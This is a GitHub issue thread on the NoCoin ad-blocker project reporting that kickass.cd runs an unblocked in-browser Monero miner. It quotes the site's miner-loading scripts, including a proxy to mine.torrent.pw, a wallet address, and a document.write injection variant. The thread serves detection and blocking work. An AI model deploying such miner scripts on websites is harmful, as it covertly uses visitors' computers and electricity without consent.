### ISSUE TITLE
Kickass.cd miner does not stop working

### ISSUE THREAD

**Issue by Niko9911** [keraf/NoCoin#119]
Site kickass.cd is using miner and it's not blocked. 

It's using following line to run the miner. Tough js is encrypted or something, so I can't understand anything... It's basicly BASE64 encoded and you can decrypt it easily. After decrypting I noticed it's also obusficated. Here is decrypted version available:  https://pastebin.com/nAhTiY7X
```
<script src="https://kickass.cd/m.js?proxy=wss://mine.torrent.pw?pool=us-backup.supportxmr.com:3333"></script>
--
  | <script>
  | var miner = CH.Anonymous('43diebQLSFGfQg5xobxSk4C42gnMUCVvU9WPxEXnBuqa9ANbThwWwaH1MELagmxQhRcXmhmaPAV1rEp9SacwzsdKNRPjxDt+100');
  | miner.start();
  | </script>
```

Basicly, this miner can be stop using command stop. So when I run miner.stop();. It will stop. Very simple miner and I'm sure this can be blocked easily, but I do not know how to write fix nor have time to write it.

**Comment by TonyRL** [comment]
```<script type="text/javascript">
if (jQuery(window).width() > 600 ) {
document.write("\n");
document.write("<script src='https://kickass.cd/power2/m.js?proxy=wss://mine.torrent.pw'><\/script>"); 
document.write("\n"); 
document.write("<script>new CH.Anonymous('X',{throttle:1-0.70}).start(CH.FORCE_EXCLUSIVE_TAB);<\/script>");
}</script>
```
and again...

**Comment by Firminator** [comment]
https://github.com/keraf/NoCoin/issues/169
